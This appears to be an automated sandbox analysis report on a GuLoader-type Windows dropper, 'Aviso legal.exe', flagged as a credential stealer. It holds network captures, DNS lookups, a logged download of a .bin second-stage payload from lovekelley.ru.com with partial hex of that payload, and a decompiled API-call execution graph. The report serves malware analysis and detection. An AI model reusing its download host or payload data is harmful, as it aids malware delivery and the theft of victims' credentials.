                              May 22, 2024 20:31:40.026468039 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.026717901 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.030826092 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.030941010 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.031162024 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.038001060 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.038117886 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.038202047 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.038290977 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.044836044 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.044850111 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.045093060 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.051654100 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.051670074 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.051893950 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:40.058461905 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:40.058696985 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:31:41.769321918 CEST49796443192.168.11.20104.26.12.205
                              May 22, 2024 20:31:41.769346952 CEST44349796104.26.12.205192.168.11.20
                              May 22, 2024 20:31:41.770241976 CEST49796443192.168.11.20104.26.12.205
                              May 22, 2024 20:31:41.783468008 CEST49796443192.168.11.20104.26.12.205
                              May 22, 2024 20:31:41.783474922 CEST44349796104.26.12.205192.168.11.20
                              May 22, 2024 20:31:42.145601988 CEST44349796104.26.12.205192.168.11.20
                              May 22, 2024 20:31:42.146598101 CEST49796443192.168.11.20104.26.12.205
                              May 22, 2024 20:31:42.147721052 CEST49796443192.168.11.20104.26.12.205
                              May 22, 2024 20:31:42.147726059 CEST44349796104.26.12.205192.168.11.20
                              May 22, 2024 20:31:42.147984982 CEST44349796104.26.12.205192.168.11.20
                              May 22, 2024 20:31:42.178507090 CEST49796443192.168.11.20104.26.12.205
                              May 22, 2024 20:31:42.220176935 CEST44349796104.26.12.205192.168.11.20
                              May 22, 2024 20:31:42.622144938 CEST44349796104.26.12.205192.168.11.20
                              May 22, 2024 20:31:42.622205973 CEST44349796104.26.12.205192.168.11.20
                              May 22, 2024 20:31:42.623277903 CEST49796443192.168.11.20104.26.12.205
                              May 22, 2024 20:31:42.624605894 CEST49796443192.168.11.20104.26.12.205
                              May 22, 2024 20:31:44.812458038 CEST8049794172.93.121.7192.168.11.20
                              May 22, 2024 20:31:44.812674046 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:33:28.489192009 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:33:29.004561901 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:33:30.019934893 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:33:32.050760031 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:33:36.096785069 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:33:44.188710928 CEST4979480192.168.11.20172.93.121.7
                              May 22, 2024 20:34:00.357021093 CEST4979480192.168.11.20172.93.121.7
                              TimestampSource PortDest PortSource IPDest IP
                              May 22, 2024 20:31:38.497641087 CEST5906653192.168.11.201.1.1.1
                              May 22, 2024 20:31:38.745045900 CEST53590661.1.1.1192.168.11.20
                              May 22, 2024 20:31:41.588360071 CEST6306753192.168.11.201.1.1.1
                              May 22, 2024 20:31:41.764492035 CEST53630671.1.1.1192.168.11.20
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              May 22, 2024 20:31:38.497641087 CEST192.168.11.201.1.1.10x6c77Standard query (0)lovekelley.ru.comA (IP address)IN (0x0001)false
                              May 22, 2024 20:31:41.588360071 CEST192.168.11.201.1.1.10x1513Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              May 22, 2024 20:31:38.745045900 CEST1.1.1.1192.168.11.200x6c77No error (0)lovekelley.ru.com172.93.121.7A (IP address)IN (0x0001)false
                              May 22, 2024 20:31:41.764492035 CEST1.1.1.1192.168.11.200x1513No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                              May 22, 2024 20:31:41.764492035 CEST1.1.1.1192.168.11.200x1513No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                              May 22, 2024 20:31:41.764492035 CEST1.1.1.1192.168.11.200x1513No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                              • api.ipify.org
                              • lovekelley.ru.com
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.11.2049794172.93.121.7806196C:\Users\user\Desktop\Aviso legal.exe
                              TimestampBytes transferredDirectionData
                              May 22, 2024 20:31:38.956564903 CEST174OUTGET /FroOsE89.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: lovekelley.ru.com
                              Cache-Control: no-cache
                              May 22, 2024 20:31:39.164582968 CEST1289INHTTP/1.1 200 OK
                              Date: Wed, 22 May 2024 18:31:38 GMT
                              Server: Apache
                              Last-Modified: Wed, 22 May 2024 07:33:48 GMT
                              Accept-Ranges: bytes
                              Content-Length: 243264
                              Content-Type: application/octet-stream
                              Data Raw: 04 bb 2c c3 ba 40 74 69 5e 39 b4 20 c9 5d 0e a2 fd 48 e0 7b b1 cf 2a a1 a6 ab ea 0a 65 3b 27 6b 5d 35 f7 e5 bc b0 ba d7 1d 1b cd 73 c7 dc 61 7d 07 56 ff b5 77 1c e7 8f 68 76 5c 76 d6 4c 88 55 c0 98 d1 77 0d 7e eb 62 d5 a9 ab b7 40 5f aa 92 33 bd a8 25 4a 2f 1a 0b 36 37 8b c7 75 31 e5 f4 a1 a6 b6 e9 cc 14 d0 65 39 0d b1 c7 93 7b d9 96 05 0d 5d e0 a6 d4 ab cb a4 08 1b 1b 80 5a 75 0b 42 60 79 da f4 c0 c8 07 5a ab 74 c7 78 cc 7e 4e 91 37 d2 7b c5 6d 74 e8 fa 7d 13 ad a0 04 0d c5 f5 1d 31 d4 1d 99 2e e0 0f 79 d0 ef 1f 52 3b 83 b7 ef 2b c5 31 38 cd 25 3f e3 f2 12 c0 fc cd 45 0c a6 68 21 5a d4 54 4d af 6d ce 24 e1 03 9c 16 38 e9 15 19 26 ea 0d 41 d3 05 d5 a9 c5 8b 75 0d a9 7e e7 c6 f4 5a 62 20 bc c8 12 52 3d 10 be 85 38 a9 a3 b3 12 cd a3 67 33 5c 00 8c 83 c6 ce 80 3e 21 cd ba 20 8a a6 ad 67 7b 72 0a 7f c2 37 8b 68 c6 e2 ed 73 23 6f 70 d9 e4 d5 f4 60 d9 b6 bc a2 04 10 5d 7a b0 f0 71 99 53 d6 a2 1d c1 8e 08 c0 c4 7f 9b 6b b1 98 c3 c8 fa 83 70 9f 9d 12 f4 b7 25 14 af b3 77 60 b9 dc 1f a9 c7 d8 54 70 95 02 61 [TRUNCATED]
                              Data Ascii: ,@ti^9 ]H{*e;'k]5sa}Vwhv\vLUw~b@_3%J/67u1e9{]ZuB`yZtx~N7{mt}1.yR;+18%?Eh!ZTMm$8&Au~Zb R=8g3\>! g{r7hs#op`]zqSkp%w`Tpac)/^7#Jc/dlb8i0\QJ'E^~?7~oPZWAE:G59nv#YL~0?:.]jU?Cf\!%s"2"r<K:lx=4DIAlfZT_CT|bFf_12bhoA]k|p57Deubw?vZ#t.x:vv%C<A|I@|orL @-kH-om;A4\2d;-@`EOxgGeYug@}2}~xI0d'[cyUD8CUyqfH*"`g3\{`Gtt}}a]'Z{|oYJl`T(qw9 {{xT"}b~'b?Ogo$fD8;m5woAWx@s^nm [TRUNCATED]
                              May 22, 2024 20:31:39.164630890 CEST1289INData Raw: 26 91 0f 46 a1 e7 ff cd bf 78 80 79 40 63 8e 0c a5 45 76 c7 7e fd ac 0f c0 80 03 92 98 61 41 57 8d 62 bb 0d 15 f8 1a b6 74 62 09 48 69 b7 d0 5d db 49 6f fc d1 0a c8 df 4f a7 5f 08 0a e1 64 d1 ac 9f 2a ac e1 7b 4a a6 4a 9e 9b 92 fb bc b4 9b e1 6a
                              Data Ascii: &Fxy@cEv~aAWbtbHi]IoO_d*{JJj[fUn=1B`"hd'+~35ZA$T*)W,WsQ[AnxvxH#tCaM!3:#r .o41
                              May 22, 2024 20:31:39.166707039 CEST1289INData Raw: 11 36 6d c5 1c 2e 12 12 c9 81 2d 68 2c fb 93 c1 2f c7 69 2b f1 cd f5 56 2d bf bb 3a fc c5 a7 a0 1f 7c 9c 1d 37 f4 cf 03 60 9c 33 ef ee 61 23 55 71 b1 5f 9f 97 7f 3f c3 04 45 f0 c4 07 ee f6 29 1d f0 25 1c f0 dc 39 eb 4c 6c 16 3f ac 30 a8 7c 4f 03
                              Data Ascii: 6m.-h,/i+V-:|7`3a#Uq_?E)%9Ll?0|Om.^wt/Yu#aiHl~7Dylug8)aDDWR$ `yO\C\m|=CW!/>YHDv`VhT=u]w/ %Cf
                              May 22, 2024 20:31:39.166754961 CEST1289INData Raw: 8c a4 a3 65 53 9e 0b 7f c4 1d 95 6a 9d 01 ed 73 25 45 52 db e7 a8 13 62 d9 f2 13 bc 06 7b b5 7a a0 f4 5b bb 51 c5 df f5 d1 8e 0c ea da 7d e0 92 b1 98 c7 e2 d8 81 73 e2 74 12 f4 0f c6 09 ad 87 9d 60 b9 d8 d5 88 c5 9d 2c 9a 95 02 65 49 19 b2 b0 5e
                              Data Ascii: eSjs%ERb{z[Q}st`,eI^-9-RA#7'h&g,ohfp8h2"Z[JZL^|=5-V8X`h|CNe4AGocv'[R+Uc{eytYTj1
                              May 22, 2024 20:31:39.168845892 CEST1289INData Raw: c6 86 13 c6 f4 92 e2 e4 1a be 38 e3 9d 4f 10 e0 6a 62 7e ec bd fa 56 57 5a e0 c8 7d c5 d8 a4 8f fc 57 02 9f 4a 1f f0 23 d0 16 d8 b9 be ed 7d 06 28 af b0 ce f1 a2 67 26 59 b1 43 a7 d1 5e 77 44 8b 29 19 dd 83 a8 06 aa fc e3 7e ff e2 65 f8 6a 93 c9
                              Data Ascii: 8Ojb~VWZ}WJ#}(g&YC^wD)~ejJ\}-7;G'>^9\8~r{_P>/.DRfp#aiG3qgSfL^{Ku3^knyp[v7tbl%#V5
                              May 22, 2024 20:31:39.168894053 CEST1289INData Raw: 22 c9 21 43 8d 22 2d 18 e3 60 fd c0 93 57 fa 1f 77 43 db 59 07 9b 96 89 e9 89 9a e1 64 00 55 9b 02 52 76 96 84 6d d8 81 02 9a e1 68 3c 31 40 a3 04 f5 8d 1c 7e d3 9c 08 9f 22 1e ad f0 96 68 8e e4 f3 67 79 cd f8 a4 24 2b f7 0f 1b 7c 4c 05 b7 2a 20
                              Data Ascii: "!C"-`WwCYdURvmh<1@~"hgy$+|L* a)n(r3z,},4. tiMKy&9sJ#9!v@g)Vn4&e2=<E4!f96wK|)Nzvyr
                              May 22, 2024 20:31:39.170985937 CEST1289INData Raw: 75 c3 b0 21 71 f0 b4 2f 10 fb 28 1b fa 32 1e 8b 40 19 eb 48 46 34 15 ab 4f 34 7a ed 27 4b 48 d7 06 1b c8 5d 18 b3 43 02 fc c6 83 52 90 75 2f a1 5e b3 3c 1a 9b 01 57 93 42 6a f2 98 6e f1 a2 5e 32 6e b5 7b 02 fd a5 e1 60 d5 45 7d fe 67 48 d4 2c 63
                              Data Ascii: u!q/(2@HF4O4z'KH]CRu/^<WBjn^2n{`E}gH,cBZ?Ex#O5^o2s~QVZ=dYJLv`&Eh]~1rwr!#oZ4}qMX:6=UNN+ j ;j$CJ]
                              May 22, 2024 20:31:39.171036005 CEST1289INData Raw: fd 6e 9f 9d 16 8a 2a ec 17 ab d4 4b 60 b9 d6 7f b7 c7 9e 55 50 90 02 61 63 f9 be cb b5 d2 e6 25 13 0f c2 d0 2f aa c3 5a a8 30 e2 a5 ba 5e df 3f 23 85 4e 27 da f1 ca d9 c0 64 80 d6 fc d1 6a 94 bd 84 92 dc 62 0d 30 ea 38 c6 81 0d 1f f7 86 1d 69 c4
                              Data Ascii: n*K`UPac%/Z0^?#N'djb08iy/\l4#q^&`;7^'PZW#gSuA9eE:5V#Yt~pNR0I:d^l'@cif\H%'6Yn.:d?k@1D.fPm\[1
                              May 22, 2024 20:31:39.173146963 CEST1289INData Raw: a3 66 0e 68 99 49 ad f9 1a 05 43 81 d7 67 f5 90 8a 1f ac dc e1 80 f1 ee 9b f6 94 9f c5 2d aa 96 b1 6a b2 a2 a2 a5 2b cd b7 9c 83 f6 24 37 a1 86 3b 47 2d b3 ed e4 c7 f1 e2 52 39 5c 16 fc 84 05 ef 38 ab b2 12 bd dd ce a1 f3 36 11 fc cc 1b 81 8d 90
                              Data Ascii: fhICg-j+$7;G-R9\86pR>"KVQ)Op./VGX6=qSvmO\{p9<@NH~b/>%Jdw8H3Fe9N8l8'iYT4[b0T{*
                              May 22, 2024 20:31:39.173197031 CEST1289INData Raw: e3 9d 0c 65 d0 10 ae 0e 64 65 8c cc 9e c0 78 e6 00 d8 85 2b d7 7a 33 6a 4c fb b3 54 0d eb 58 81 0f c4 d4 d0 fc ca 80 41 ea 6d 91 c4 6e c9 19 f2 2b 03 66 cc c2 a3 03 33 87 7f 2c 75 e6 2c dd af f0 43 1c df 8b 35 da 95 69 6d 1f a4 9e ee 1f e4 74 6f
                              Data Ascii: edex+z3jLTXAmn+f3,u,C5imto'Ac9!v@o)V8"/?`9o"lj7?y"1NrHk#C0:CxaozYThQ|j5GG<PSDT -#]XX
                              May 22, 2024 20:31:39.371903896 CEST1289INData Raw: 01 ab 61 4d 6a d2 b3 69 f1 a2 7e cd 60 b6 7b 2a 07 ab e2 66 57 6f 73 fe 67 b6 2b 1b 45 18 42 a4 f4 b7 3c 98 87 e6 ab 78 04 0a b3 1d e7 45 90 f4 cc 35 54 ce 1e 80 1f ec 28 c5 d6 fc 99 cf 74 7d 7d fb e2 14 5d 55 a4 95 a0 ed 3d bb 0d 3c d8 82 9e 39
                              Data Ascii: aMji~`{*fWosg+EB<xE5T(t}}]U=<9Wr+v`]k=vU)1~{AX:tVnf< j:CJ]}i4fF}\D0)sRGx0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.11.2049796104.26.12.2054436196C:\Users\user\Desktop\Aviso legal.exe
                              TimestampBytes transferredDirectionData
                              2024-05-22 18:31:42 UTC155OUTGET / HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                              Host: api.ipify.org
                              Connection: Keep-Alive
                              2024-05-22 18:31:42 UTC211INHTTP/1.1 200 OK
                              Date: Wed, 22 May 2024 18:31:42 GMT
                              Content-Type: text/plain
                              Content-Length: 12
                              Connection: close
                              Vary: Origin
                              CF-Cache-Status: DYNAMIC
                              Server: cloudflare
                              CF-RAY: 887ee27a3ca89b53-SEA
                              2024-05-22 18:31:42 UTC12INData Raw: 38 31 2e 31 38 31 2e 36 30 2e 33 34
                              Data Ascii: 81.181.60.34


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:14:30:54
                              Start date:22/05/2024
                              Path:C:\Users\user\Desktop\Aviso legal.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\Aviso legal.exe"
                              Imagebase:0x400000
                              File size:841'240 bytes
                              MD5 hash:C7AE7BFDA7F71B76C6F3213CFE94529E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1406570812.0000000005C09000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:10
                              Start time:14:31:25
                              Start date:22/05/2024
                              Path:C:\Users\user\Desktop\Aviso legal.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\Aviso legal.exe"
                              Imagebase:0x400000
                              File size:841'240 bytes
                              MD5 hash:C7AE7BFDA7F71B76C6F3213CFE94529E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.6069498581.00000000362C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:false

                              Reset < >

                                Execution Graph

                                Execution Coverage:21.8%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:16%
                                Total number of Nodes:1564
                                Total number of Limit Nodes:39
                                execution_graph 3923 4015c1 3942 402da6 3923->3942 3927 401631 3929 401663 3927->3929 3930 401636 3927->3930 3933 401423 24 API calls 3929->3933 3966 401423 3930->3966 3938 40165b 3933->3938 3937 40164a SetCurrentDirectoryW 3937->3938 3939 4015d1 3939->3927 3940 401617 GetFileAttributesW 3939->3940 3954 405e39 3939->3954 3958 405b08 3939->3958 3961 405a6e CreateDirectoryW 3939->3961 3970 405aeb CreateDirectoryW 3939->3970 3940->3939 3943 402db2 3942->3943 3973 40657a 3943->3973 3946 4015c8 3948 405eb7 CharNextW CharNextW 3946->3948 3949 405ed4 3948->3949 3951 405ee6 3948->3951 3949->3951 3952 405ee1 CharNextW 3949->3952 3950 405f0a 3950->3939 3951->3950 3953 405e39 CharNextW 3951->3953 3952->3950 3953->3951 3955 405e3f 3954->3955 3956 405e55 3955->3956 3957 405e46 CharNextW 3955->3957 3956->3939 3957->3955 4011 40690a GetModuleHandleA 3958->4011 3962 405abb 3961->3962 3963 405abf GetLastError 3961->3963 3962->3939 3963->3962 3964 405ace SetFileSecurityW 3963->3964 3964->3962 3965 405ae4 GetLastError 3964->3965 3965->3962 4020 40559f 3966->4020 3969 40653d lstrcpynW 3969->3937 3971 405afb 3970->3971 3972 405aff GetLastError 3970->3972 3971->3939 3972->3971 3977 406587 3973->3977 3974 4067aa 3975 402dd3 3974->3975 4006 40653d lstrcpynW 3974->4006 3975->3946 3990 4067c4 3975->3990 3977->3974 3978 406778 lstrlenW 3977->3978 3981 40657a 10 API calls 3977->3981 3982 40668f GetSystemDirectoryW 3977->3982 3984 4066a2 GetWindowsDirectoryW 3977->3984 3985 406719 lstrcatW 3977->3985 3986 40657a 10 API calls 3977->3986 3987 4067c4 5 API calls 3977->3987 3988 4066d1 SHGetSpecialFolderLocation 3977->3988 3999 40640b 3977->3999 4004 406484 wsprintfW 3977->4004 4005 40653d lstrcpynW 3977->4005 3978->3977 3981->3978 3982->3977 3984->3977 3985->3977 3986->3977 3987->3977 3988->3977 3989 4066e9 SHGetPathFromIDListW CoTaskMemFree 3988->3989 3989->3977 3991 4067d1 3990->3991 3993 40683a CharNextW 3991->3993 3994 406847 3991->3994 3996 405e39 CharNextW 3991->3996 3997 406826 CharNextW 3991->3997 3998 406835 CharNextW 3991->3998 3992 40684c CharPrevW 3992->3994 3993->3991 3993->3994 3994->3992 3995 40686d 3994->3995 3995->3946 3996->3991 3997->3991 3998->3993 4007 4063aa 3999->4007 4002 40643f RegQueryValueExW RegCloseKey 4003 40646f 4002->4003 4003->3977 4004->3977 4005->3977 4006->3975 4008 4063b9 4007->4008 4009 4063c2 RegOpenKeyExW 4008->4009 4010 4063bd 4008->4010 4009->4010 4010->4002 4010->4003 4012 406930 GetProcAddress 4011->4012 4013 406926 4011->4013 4015 405b0f 4012->4015 4017 40689a GetSystemDirectoryW 4013->4017 4015->3939 4016 40692c 4016->4012 4016->4015 4019 4068bc wsprintfW LoadLibraryExW 4017->4019 4019->4016 4022 4055ba 4020->4022 4030 401431 4020->4030 4021 4055d6 lstrlenW 4024 4055e4 lstrlenW 4021->4024 4025 4055ff 4021->4025 4022->4021 4023 40657a 17 API calls 4022->4023 4023->4021 4026 4055f6 lstrcatW 4024->4026 4024->4030 4027 405612 4025->4027 4028 405605 SetWindowTextW 4025->4028 4026->4025 4029 405618 SendMessageW SendMessageW SendMessageW 4027->4029 4027->4030 4028->4027 4029->4030 4030->3969 4031 401941 4032 401943 4031->4032 4033 402da6 17 API calls 4032->4033 4034 401948 4033->4034 4037 405c49 4034->4037 4073 405f14 4037->4073 4040 405c71 DeleteFileW 4047 401951 4040->4047 4041 405c88 4044 405da8 4041->4044 4087 40653d lstrcpynW 4041->4087 4043 405cae 4045 405cc1 4043->4045 4046 405cb4 lstrcatW 4043->4046 4044->4047 4105 406873 FindFirstFileW 4044->4105 4097 405e58 lstrlenW 4045->4097 4048 405cc7 4046->4048 4051 405cd7 lstrcatW 4048->4051 4053 405ce2 lstrlenW FindFirstFileW 4048->4053 4051->4053 4053->4044 4071 405d04 4053->4071 4056 405d8b FindNextFileW 4059 405da1 FindClose 4056->4059 4056->4071 4057 405c01 5 API calls 4060 405de3 4057->4060 4059->4044 4061 405de7 4060->4061 4062 405dfd 4060->4062 4061->4047 4065 40559f 24 API calls 4061->4065 4064 40559f 24 API calls 4062->4064 4064->4047 4067 405df4 4065->4067 4066 405c49 60 API calls 4066->4071 4068 4062fd 36 API calls 4067->4068 4068->4047 4069 40559f 24 API calls 4069->4056 4070 40559f 24 API calls 4070->4071 4071->4056 4071->4066 4071->4069 4071->4070 4088 40653d lstrcpynW 4071->4088 4089 405c01 4071->4089 4101 4062fd MoveFileExW 4071->4101 4111 40653d lstrcpynW 4073->4111 4075 405f25 4076 405eb7 4 API calls 4075->4076 4077 405f2b 4076->4077 4078 405c69 4077->4078 4079 4067c4 5 API calls 4077->4079 4078->4040 4078->4041 4085 405f3b 4079->4085 4080 405f6c lstrlenW 4081 405f77 4080->4081 4080->4085 4082 405e0c 3 API calls 4081->4082 4084 405f7c GetFileAttributesW 4082->4084 4083 406873 2 API calls 4083->4085 4084->4078 4085->4078 4085->4080 4085->4083 4086 405e58 2 API calls 4085->4086 4086->4080 4087->4043 4088->4071 4112 406008 GetFileAttributesW 4089->4112 4092 405c2e 4092->4071 4093 405c24 DeleteFileW 4095 405c2a 4093->4095 4094 405c1c RemoveDirectoryW 4094->4095 4095->4092 4096 405c3a SetFileAttributesW 4095->4096 4096->4092 4098 405e66 4097->4098 4099 405e78 4098->4099 4100 405e6c CharPrevW 4098->4100 4099->4048 4100->4098 4100->4099 4102 40631e 4101->4102 4103 406311 4101->4103 4102->4071 4115 406183 4103->4115 4106 405dcd 4105->4106 4107 406889 FindClose 4105->4107 4106->4047 4108 405e0c lstrlenW CharPrevW 4106->4108 4107->4106 4109 405dd7 4108->4109 4110 405e28 lstrcatW 4108->4110 4109->4057 4110->4109 4111->4075 4113 405c0d 4112->4113 4114 40601a SetFileAttributesW 4112->4114 4113->4092 4113->4093 4113->4094 4114->4113 4116 4061b3 4115->4116 4117 4061d9 GetShortPathNameW 4115->4117 4142 40602d GetFileAttributesW CreateFileW 4116->4142 4118 4062f8 4117->4118 4119 4061ee 4117->4119 4118->4102 4119->4118 4121 4061f6 wsprintfA 4119->4121 4123 40657a 17 API calls 4121->4123 4122 4061bd CloseHandle GetShortPathNameW 4122->4118 4124 4061d1 4122->4124 4125 40621e 4123->4125 4124->4117 4124->4118 4143 40602d GetFileAttributesW CreateFileW 4125->4143 4127 40622b 4127->4118 4128 40623a GetFileSize GlobalAlloc 4127->4128 4129 4062f1 CloseHandle 4128->4129 4130 40625c 4128->4130 4129->4118 4144 4060b0 ReadFile 4130->4144 4135 40627b lstrcpyA 4138 40629d 4135->4138 4136 40628f 4137 405f92 4 API calls 4136->4137 4137->4138 4139 4062d4 SetFilePointer 4138->4139 4151 4060df WriteFile 4139->4151 4142->4122 4143->4127 4145 4060ce 4144->4145 4145->4129 4146 405f92 lstrlenA 4145->4146 4147 405fd3 lstrlenA 4146->4147 4148 405fac lstrcmpiA 4147->4148 4149 405fdb 4147->4149 4148->4149 4150 405fca CharNextA 4148->4150 4149->4135 4149->4136 4150->4147 4152 4060fd GlobalFree 4151->4152 4152->4129 5002 401c43 5003 402d84 17 API calls 5002->5003 5004 401c4a 5003->5004 5005 402d84 17 API calls 5004->5005 5006 401c57 5005->5006 5007 401c6c 5006->5007 5008 402da6 17 API calls 5006->5008 5009 401c7c 5007->5009 5010 402da6 17 API calls 5007->5010 5008->5007 5011 401cd3 5009->5011 5012 401c87 5009->5012 5010->5009 5013 402da6 17 API calls 5011->5013 5014 402d84 17 API calls 5012->5014 5015 401cd8 5013->5015 5016 401c8c 5014->5016 5017 402da6 17 API calls 5015->5017 5018 402d84 17 API calls 5016->5018 5020 401ce1 FindWindowExW 5017->5020 5019 401c98 5018->5019 5021 401cc3 SendMessageW 5019->5021 5022 401ca5 SendMessageTimeoutW 5019->5022 5023 401d03 5020->5023 5021->5023 5022->5023 5024 705b1058 5026 705b1074 5024->5026 5025 705b10dd 5026->5025 5028 705b1092 5026->5028 5037 705b15b6 5026->5037 5029 705b15b6 GlobalFree 5028->5029 5030 705b10a2 5029->5030 5031 705b10a9 GlobalSize 5030->5031 5032 705b10b2 5030->5032 5031->5032 5033 705b10c7 5032->5033 5034 705b10b6 GlobalAlloc 5032->5034 5036 705b10d2 GlobalFree 5033->5036 5035 705b15dd 3 API calls 5034->5035 5035->5033 5036->5025 5039 705b15bc 5037->5039 5038 705b15c2 5038->5028 5039->5038 5040 705b15ce GlobalFree 5039->5040 5040->5028 5041 404943 5042 404953 5041->5042 5043 404979 5041->5043 5044 404499 18 API calls 5042->5044 5045 404500 8 API calls 5043->5045 5046 404960 SetDlgItemTextW 5044->5046 5047 404985 5045->5047 5046->5043 5048 4028c4 5049 4028ca 5048->5049 5050 4028d2 FindClose 5049->5050 5051 402c2a 5049->5051 5050->5051 5055 4016cc 5056 402da6 17 API calls 5055->5056 5057 4016d2 GetFullPathNameW 5056->5057 5060 4016ec 5057->5060 5064 40170e 5057->5064 5058 401723 GetShortPathNameW 5059 402c2a 5058->5059 5061 406873 2 API calls 5060->5061 5060->5064 5062 4016fe 5061->5062 5062->5064 5065 40653d lstrcpynW 5062->5065 5064->5058 5064->5059 5065->5064 5066 401e4e GetDC 5067 402d84 17 API calls 5066->5067 5068 401e60 GetDeviceCaps MulDiv ReleaseDC 5067->5068 5069 402d84 17 API calls 5068->5069 5070 401e91 5069->5070 5071 40657a 17 API calls 5070->5071 5072 401ece CreateFontIndirectW 5071->5072 5073 402638 5072->5073 5074 4045cf lstrcpynW lstrlenW 5075 402950 5076 402da6 17 API calls 5075->5076 5078 40295c 5076->5078 5077 402972 5080 406008 2 API calls 5077->5080 5078->5077 5079 402da6 17 API calls 5078->5079 5079->5077 5081 402978 5080->5081 5103 40602d GetFileAttributesW CreateFileW 5081->5103 5083 402985 5084 402a3b 5083->5084 5087 4029a0 GlobalAlloc 5083->5087 5088 402a23 5083->5088 5085 402a42 DeleteFileW 5084->5085 5086 402a55 5084->5086 5085->5086 5087->5088 5089 4029b9 5087->5089 5090 4032b4 31 API calls 5088->5090 5104 4034e5 SetFilePointer 5089->5104 5092 402a30 CloseHandle 5090->5092 5092->5084 5093 4029bf 5094 4034cf ReadFile 5093->5094 5095 4029c8 GlobalAlloc 5094->5095 5096 4029d8 5095->5096 5097 402a0c 5095->5097 5098 4032b4 31 API calls 5096->5098 5099 4060df WriteFile 5097->5099 5102 4029e5 5098->5102 5100 402a18 GlobalFree 5099->5100 5100->5088 5101 402a03 GlobalFree 5101->5097 5102->5101 5103->5083 5104->5093 5105 401956 5106 402da6 17 API calls 5105->5106 5107 40195d lstrlenW 5106->5107 5108 402638 5107->5108 5109 4014d7 5110 402d84 17 API calls 5109->5110 5111 4014dd Sleep 5110->5111 5113 402c2a 5111->5113 4616 4020d8 4617 4020ea 4616->4617 4627 40219c 4616->4627 4618 402da6 17 API calls 4617->4618 4620 4020f1 4618->4620 4619 401423 24 API calls 4625 4022f6 4619->4625 4621 402da6 17 API calls 4620->4621 4622 4020fa 4621->4622 4623 402110 LoadLibraryExW 4622->4623 4624 402102 GetModuleHandleW 4622->4624 4626 402121 4623->4626 4623->4627 4624->4623 4624->4626 4639 406979 4626->4639 4627->4619 4630 402132 4633 402151 4630->4633 4634 40213a 4630->4634 4631 40216b 4632 40559f 24 API calls 4631->4632 4635 402142 4632->4635 4644 705b1817 4633->4644 4636 401423 24 API calls 4634->4636 4635->4625 4637 40218e FreeLibrary 4635->4637 4636->4635 4637->4625 4686 40655f WideCharToMultiByte 4639->4686 4641 406996 4642 40699d GetProcAddress 4641->4642 4643 40212c 4641->4643 4642->4643 4643->4630 4643->4631 4645 705b184a 4644->4645 4687 705b1bff 4645->4687 4647 705b1851 4648 705b1976 4647->4648 4649 705b1869 4647->4649 4650 705b1862 4647->4650 4648->4635 4719 705b2480 4649->4719 4735 705b243e 4650->4735 4655 705b18af 4748 705b2655 4655->4748 4656 705b18cd 4660 705b191e 4656->4660 4661 705b18d3 4656->4661 4657 705b1898 4669 705b188e 4657->4669 4745 705b2e23 4657->4745 4658 705b187f 4665 705b1890 4658->4665 4666 705b1885 4658->4666 4663 705b2655 10 API calls 4660->4663 4767 705b1666 4661->4767 4670 705b190f 4663->4670 4664 705b18b5 4759 705b1654 4664->4759 4739 705b2810 4665->4739 4666->4669 4729 705b2b98 4666->4729 4669->4655 4669->4656 4677 705b1965 4670->4677 4773 705b2618 4670->4773 4674 705b2655 10 API calls 4674->4670 4676 705b1896 4676->4669 4677->4648 